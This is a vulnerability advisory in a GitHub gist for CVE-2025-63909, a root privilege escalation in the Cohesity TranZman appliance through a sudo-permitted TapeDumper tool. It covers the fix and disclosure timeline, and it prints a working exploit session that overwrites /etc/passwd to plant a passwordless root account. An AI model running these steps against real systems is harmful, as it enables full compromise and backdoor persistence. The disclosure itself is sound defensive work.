Skip to content

Instantly share code, notes, and snippets.

@GregDurys

GregDurys/CVE-2025-63909.md

Created March 2, 2026 17:29
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save GregDurys/d402038147e36de5908159d9722072ef to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save GregDurys/d402038147e36de5908159d9722072ef to your computer and use it in GitHub Desktop.
Download ZIP
CVE-2025-63909 - Cohesity TranZman Local Privilege Escalation
Raw
CVE-2025-63909.md

CVE-2025-63909: Local Privilege Escalation in Cohesity TranZman

Overview

Field Value
CVE ID CVE-2025-63909
CVSS v3.1 7.2 (High)
Vector AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CWE CWE-269: Improper Privilege Management
Vendor Cohesity, Inc.
Product TranZman Migration Appliance
Affected Versions Release 4.0 Build 14614 including patch TZM_1757588060_SEP2025_FULL.depot

Description

Incorrect access control in the component /opt/SRLtzm/bin/TapeDumper of Cohesity TranZman Migration Appliance allows attackers to escalate privileges to root and read and write arbitrary files.

The vulnerability exists due to:

  • Overly permissive sudo configuration in /etc/sudoers
  • Admin user has NOPASSWD access to /opt/SRLtzm/bin/*
  • TapeDumper binary treats any file as a tape device, enabling arbitrary file read/write as root

Attack Vector

Prerequisites: Shell access (typically obtained via CLISH command injection - CVE-2025-63911)

TapeDumper is an interactive CLI tool that accepts open and dump commands. It treats arbitrary files as "tape devices", allowing unrestricted read/write operations without validation.

Exploitation steps:

  1. Escape from CLISH using command injection vulnerability
  2. Create a writable staging file
  3. Launch TapeDumper with sudo, use open to read /etc/passwd and dump to write contents to the staging file
  4. Append a passwordless root user to the staging file
  5. Launch TapeDumper again, open the staging file and dump back to /etc/passwd
  6. Switch to root via su bob

Example session:

[admin@tzm ~]$ touch /tmp/staging
[admin@tzm ~]$ sudo /opt/SRLtzm/bin/TapeDumper
Stone Ram Tape Dumper (862)
open /etc/passwd
dump /tmp/staging
Dumped to '/tmp/staging', size 1859
^C
[admin@tzm ~]$ echo "bob::0:0::/root:/bin/bash" >> /tmp/staging
[admin@tzm ~]$ sudo /opt/SRLtzm/bin/TapeDumper
open /tmp/staging
dump /etc/passwd
Dumped to '/etc/passwd', size 1885
^C
[admin@tzm ~]$ su bob
[root@tzm ~]# id
uid=0(root) gid=0(root) groups=0(root)

Impact

  • Root Access: Complete privilege escalation to root
  • Arbitrary File Access: Read/write any file on the system
  • Persistence: Create backdoor accounts
  • Full System Compromise: Complete control of the TranZman appliance

Remediation

Apply Cohesity patches in the following order:

  1. TZM_patch_1.patch
  2. TZM_1760106063_OCT2025R2_FULL.depot

Contact Cohesity support for the latest OVA version with integrated fixes.

Note: While Cohesity's CLISH fix may reduce exposure by preventing initial shell access, the underlying sudo/TapeDumper vulnerability remains exploitable if alternative shell access is obtained.

Timeline

Date Event
26 September 2025 Reported to Cohesity
20 October 2025 Cohesity confirmed fix in patches
25 December 2025 Embargo period ended
27 December 2025 Public disclosure

Credit

Discovered by Greg Durys, LME

References

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment